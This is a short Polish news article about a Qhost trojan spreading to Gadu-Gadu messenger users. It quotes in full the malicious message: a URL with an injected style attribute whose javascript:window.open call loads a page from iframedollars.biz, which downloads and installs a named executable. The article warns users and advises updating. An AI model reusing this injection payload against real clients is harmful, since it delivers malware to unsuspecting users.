Koń trojański w GG

Popularny komunikator Gadu Gadu stał się celem wirusa rozsyłanego z wykorzystaniem dziur opisanych niedawno (zobacz <a href="http://nt.interia.pl/news?inf=572612">tutaj</a>). Tuż przed świętami użytkownicy Gadu-Gadu zaczęli otrzymywać wiadomość, której odebranie powoduje instalację trojana Qhost, poinformował serwis Hacking.pl

Wiadomość rozsyłana jest z bramki WWW - GG o numerze 7021349. Jej treść zawiera poniższy adres URL:

www.po"style=background-image:url(javascript:window.open('http://iframedollars.biz/dl/adv407.php','','left=10000'));".pl

Odebranie tej wiadomości powoduje pobranie programu http://iframedollars.biz/dl/loadadv407.exe i zainstalowanie go na komputerze ofiary. Użytkownikom GG zaleca się jak najszybszą instalację najnowszej wersji lub skorzystanie z alternatywnych programów, które umożliwiają korzystanie z sieci Gadu-Gadu (np.: Miranda, Konnekt, Tlen i.t.p.,).

(źródło: Web Express, opr. kg)

INTERIA.PL
Masz sugestie, uwagi albo widzisz błąd?
Dołącz do nas